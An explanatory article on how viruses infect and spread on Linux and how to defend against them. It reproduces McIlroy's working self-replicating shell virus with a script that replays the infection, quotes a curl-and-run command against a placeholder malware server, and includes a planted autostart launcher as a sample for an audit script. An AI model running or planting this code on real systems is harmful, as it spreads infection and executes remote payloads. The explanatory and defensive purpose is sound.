Source Code Injection, Self-Replication and Propagation
A computer virus is a piece of code that inserts itself into the execution path of another program. It must also be able to replicate, by writing copies of the injected code into other existing files, and it must find a not-yet-infected host on which to propagate, so that the injected code keeps spreading.
Virus clicks and worms crawl
Viruses have become very common, infecting millions of machines with their code. What is the difference between a worm and a virus? A worm is very similar to a virus but differs in how it propagates. A worm enters a computer through a network-reachable vulnerability and uses that flaw to spread on its own, whereas a virus relies on user action, such as a click that executes an e-mail attachment.
Shell Script Virus
Douglas McIlroy developed a simple shell-script virus, a 150-byte version of which he called Traductor simplicimus. It fits in six lines, and its only trick is that the comment #virus# doubles as an infection marker and as the start address for the sed command that copies the payload. The code for McIlroy's virus is reproduced below (the payload is appended to the host with >>, so the infected script keeps doing its original job, and stderr is discarded so that a directory in the listing does not make sed complain):
for i in * #virus#
do case "`sed 1q $i`"
in "#!/bin/sh")
grep '#virus#' $i >/dev/null ||
sed -n '/#virus#/,$p' $0 >>$i
esac
done 2>/dev/null
The loop walks every entry in the current directory, reads its first line with sed 1q and, for entries that start with #!/bin/sh, checks for the #virus# marker; a script that lacks it gets everything from the marker line to the end of the running script ($0) appended to it. Now, given an infected shell script, infected.sh, consider how the infection spreads:
% ls
infected.sh hello.sh
% cat hello.sh
#!/bin/sh
echo "Hello, World!"
% ./infected.sh
% cat hello.sh
#!/bin/sh
echo "Hello, World!"
for i in * #virus#
do case "`sed 1q $i`"
in "#!/bin/sh")
grep '#virus#' $i >/dev/null ||
sed -n '/#virus#/,$p' $0 >>$i
esac
done 2>/dev/null
hello.sh still prints its greeting, but running it now infects every other #!/bin/sh script in its directory, and the marker stops it from being infected a second time.
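To see the three properties the text relies on (only #!/bin/sh files are touched, the payload is appended so the host keeps working, and the marker stops reinfection), you can replay the infection in a throwaway directory. The script below is an added example, not McIlroy's code or the article's; the sandbox files it creates (infected.sh, hello.sh, other.sh, notes.txt, later.sh) are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the article or McIlroy): replay the infection in a
# throwaway directory and verify the behaviour the text describes.
set -u

# Build the sandbox: the carrier, a clean /bin/sh script, a bash script
# (wrong shebang) and a plain data file. Prints the sandbox path.
make_sandbox() {
    dir=$(mktemp -d) || return 1
    # The virus body; quoted heredoc so $i, $0 and backticks stay literal.
    cat >"$dir/infected.sh" <<'EOF'
#!/bin/sh
for i in * #virus#
do case "`sed 1q $i`"
in "#!/bin/sh")
grep '#virus#' $i >/dev/null ||
sed -n '/#virus#/,$p' $0 >>$i
esac
done 2>/dev/null
EOF
    printf '#!/bin/sh\necho "Hello, World!"\n' >"$dir/hello.sh"
    printf '#!/bin/bash\necho "not a /bin/sh script"\n' >"$dir/other.sh"
    printf 'just data\n' >"$dir/notes.txt"
    chmod +x "$dir/infected.sh" "$dir/hello.sh" "$dir/other.sh"
    echo "$dir"
}

# Exit 0 if the file carries the marker the virus uses to avoid reinfection.
is_infected() { grep -q '#virus#' "$1"; }

# How many copies of the marker line a file holds (the grep and sed lines of
# the payload also contain #virus#, so count the loop header specifically).
marker_count() { grep -c '^for i in \* #virus#' "$1" || true; }

# Run a script from inside the sandbox, as a user typing ./name would.
run_script() { (cd "$1" && "./$2") || true; }

# Whole demonstration: prints "all checks passed" and returns 0 when every
# property holds, returns 1 at the first one that does not.
demo() {
    dir=$(make_sandbox) || return 1
    run_script "$dir" infected.sh
    is_infected "$dir/hello.sh"  || return 1   # /bin/sh script got the payload
    is_infected "$dir/other.sh"  && return 1   # bash shebang: left alone
    is_infected "$dir/notes.txt" && return 1   # data file: left alone
    out=$(run_script "$dir" hello.sh)          # host still does its job...
    [ "$out" = "Hello, World!" ] || return 1
    run_script "$dir" infected.sh              # a second pass changes nothing
    [ "$(marker_count "$dir/hello.sh")" = 1 ] || return 1
    printf '#!/bin/sh\necho later\n' >"$dir/later.sh"   # a new clean script
    chmod +x "$dir/later.sh"
    run_script "$dir" hello.sh >/dev/null      # ...and is now a carrier itself
    is_infected "$dir/later.sh"  || return 1
    rm -rf "$dir"
    echo "all checks passed"
}

demo
```

The same grep that the virus uses to avoid reinfecting a file is also the simplest detector for it: scanning a directory tree for the #virus# marker finds every carrier, which is why real viruses of this kind avoid leaving a fixed string behind.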
Modes of Virus propagation
Computer viruses can be transmitted in many ways, such as:
- Email attachments
- Malicious URLs
- Source Code
- Rootkits
In this article I would like to emphasize that although it is harder for a virus to infect an open-source OS such as Linux, that does not mean you should go without anti-virus protection.
Email Attachments
Why are email attachments less of a problem on Linux? Mainly because nearly all malicious email attachments target Windows machines, and they usually arrive as .exe files or as .zip archives containing one. But suppose the attachment targets Linux and arrives as a .deb, .rpm or .bin; what then? First of all, if the file is a .deb and you are on an RPM-based system, nothing will happen: the package manager will not install it. If you receive a .rpm on an RPM-based system, the package manager asks for your root or sudo password before installing, so the package does not run without a deliberate decision on your part. The caveat is that once you supply that password, the package's install scripts run as root, so the password prompt is the only barrier between you and whatever the package does. The difference from the traditional Windows model is that a double-clicked attachment in Windows could historically install itself without any such prompt (User Account Control later added one for changes that need administrator rights). One click, the virus is injected, and you are the infected host.
Attachments saved to disk are not normally executable on Linux or OpenBSD. For a file to be run directly, the execute bit must be set in its permissions. Windows has no such bit; it decides whether a file is a program from its extension, which is often cited as one reason infecting a Windows PC is so easy and why it should be much harder on *nix systems. When you save an email attachment under Linux, the execute bit is not set, so clicking on it will not execute it. The caveat is that the bit only governs direct execution: a script without it can still be run by handing it to its interpreter explicitly (sh attachment.sh), which is exactly how the malicious command line under Malicious URLs below works. So, no luck for the attacker?
And if you run your own email server, such as Postfix on a Linux machine, anti-virus scanning is a must. Just because the mail server is a Linux machine does not mean an email carrying a virus is harmless: that virus can easily travel on to a Windows machine, where it will happily begin its infectious life. To that end, install an anti-virus such as ClamAV and hook it into the mail flow (for Postfix, typically through clamav-milter or a content filter such as amavisd-new).
Malicious URLs
One type of malicious URL is a spoofed address: a malicious address that masquerades as a legitimate one, for example a fake bank or PayPal login page. Any address can be spoofed, and any address that asks you to log in with credentials is dangerous when spoofed, because the credentials you type go to the attacker.
Do these threats directly affect the Linux operating system? No, but they do affect the user. Fortunately most modern browsers have add-ons that protect your browsing.
NoScript is a Firefox extension and NotScripts is a Chromium extension; both allow JavaScript, Java and other active content to run only from sites you trust. That makes them the best browser protection against Cross-Site Scripting (XSS) and click-jacking attacks.
Popular search engines such as Google, Yahoo and Bing keep track of your searches and build a search-based profile of you in their databases. One class of add-on counters this not by hiding your searches but by issuing random, indistinguishable search queries alongside your real ones, which makes it practically impossible for the search engine to aggregate the data into a meaningful user profile.
Passive Cache fetches a cached copy of the page at the given URL from Google, together with a list of other cached copies of the same page from the Archive.org Wayback Machine, so you can view historical versions of the page without making any connection to the target website.
Adblock Plus blocks ads on websites, including Facebook and YouTube; it is a community-driven open-source project aimed at ad-free browsing. An example of the kind of command line a malicious page tries to get a user to run is shown below:
% bash -c "curl http://www.malware_server.org/s.py -o /tmp/s.py; python /tmp/s.py"
It starts bash, a command shell, and passes it a string containing two commands, which bash executes in turn. The first (curl) downloads a script from the malware server and stores it somewhere any user can write to (the /tmp directory). The second calls the Python interpreter on the freshly downloaded script. Note that no execute bit is needed at any point: the script is handed straight to its interpreter, so the permission model that protects against a double-clicked attachment does not apply here.
Source Code
Linux being open source does not mean every piece of software out there can be trusted. Software from an official repository, such as the Ubuntu Software Center or Debian's archives, is reviewed and signed by the distribution and is as safe as it gets; once you venture outside that known and trusted source, you risk installing malicious software.
Modern desktop environments such as GNOME and KDE offer a convenient workaround called a launcher (a .desktop file). These are small text files that describe how something should be started: a few lines giving the name, the icon to display and the actual command to execute (the Exec= key). The syntax is shared by GNOME and KDE. The launcher itself does not need the execute bit: the desktop environment treats these files as a special case and runs the command named in the file when you click on it. There was a proof-of-concept virus for Linux that took advantage of this with both GNOME and KDE launchers: dropping a launcher into the autostart folder (~/.config/autostart for GNOME, ~/.kde/Autostart for older KDE) is enough for its command to run at every login. Current GNOME file managers warn before launching a .desktop file that is not marked executable or trusted, which covers the click case, but autostart entries are still processed at login, so that directory is worth checking.
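A practitioner's check for the launcher trick is to list the .desktop files a session will run at login and flag any whose Exec= command points into a user-writable location or wraps a shell with -c. The script below is an added example, not the article's or the proof-of-concept's code; the two sample launchers it writes (a benign nm-applet entry and a planted one pointing into /tmp) are constructed, and the path patterns it treats as suspicious are an assumed heuristic, not a definition of malice.

```shell
#!/bin/sh
# Added example (not from the article or the proof-of-concept): audit the
# launchers a desktop session runs at login and flag ones whose command lives
# in a user-writable place. The "suspicious" rule is an assumed heuristic.
set -u

# First Exec= / Name= value of a .desktop file (the keys the desktop reads).
exec_line() { sed -n 's/^Exec=//p' "$1" | head -n 1; }
name_line() { sed -n 's/^Name=//p' "$1" | head -n 1; }

# Verdict for one launcher: "suspicious" when the command points into a
# temporary or home directory or wraps a shell with -c, otherwise "ok".
classify() {
    case "$(exec_line "$1")" in
        *'/tmp/'*|*'/var/tmp/'*|*'/dev/shm/'*|*'/home/'*|*'$HOME'*|*' -c '*)
            echo suspicious ;;
        *)  echo ok ;;
    esac
}

# One line per launcher in a directory: verdict, name, command (tab-separated).
audit_dir() {
    for f in "$1"/*.desktop; do
        [ -f "$f" ] || continue
        printf '%s\t%s\t%s\n' "$(classify "$f")" "$(name_line "$f")" "$(exec_line "$f")"
    done
}

# Number of launchers in a directory that were flagged.
count_suspicious() { audit_dir "$1" | grep -c '^suspicious' || true; }

# Constructed sample autostart directory: a normal entry and a planted one.
make_samples() {
    d=$(mktemp -d) || return 1
    cat >"$d/nm-applet.desktop" <<'EOF'
[Desktop Entry]
Type=Application
Name=Network Manager Applet
Exec=/usr/bin/nm-applet
EOF
    cat >"$d/updates.desktop" <<'EOF'
[Desktop Entry]
Type=Application
Name=Software Updates
Exec=sh -c "/tmp/.cache/update.sh"
X-GNOME-Autostart-enabled=true
EOF
    echo "$d"
}

# Stand-alone run: audit the constructed samples, then the real autostart dir.
samples=$(make_samples)
audit_dir "$samples"
rm -rf "$samples"
audit_dir "${XDG_CONFIG_HOME:-${HOME:-/nonexistent}/.config}/autostart"
```

The same audit applies to the system-wide /etc/xdg/autostart directory, where a package install script running as root (see the .rpm discussion above) could just as easily drop a launcher.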
Rootkits
Rootkits are the real danger. A rootkit is a malicious program designed to hide its own presence so that the user has no idea it was installed or is running. To have a chance of detecting one, install a tool such as rkhunter when you set up a new Linux system: it records a baseline of system file properties while the machine is still clean and reports later deviations from it, which is why it should go in before the machine is exposed.
Rootkits are nasty pieces of software that, once installed, are really hard to remove, and some compromise the system so thoroughly that it cannot be recovered short of a reinstall. If you are wondering how many rootkits are out there, install rkhunter and run rkhunter --list rootkits to see how many it checks for. Rootkits do not attack only servers; desktop machines can be infected too, especially a Linux machine sitting on a static IP address with no firewall between it and the outside world.
Hello there, I just became aware of your blog through Google and found that it's truly informative. I am gonna watch out for Brussels. I'll be grateful if you continue this in future. Numerous people will benefit from your writing. Cheers!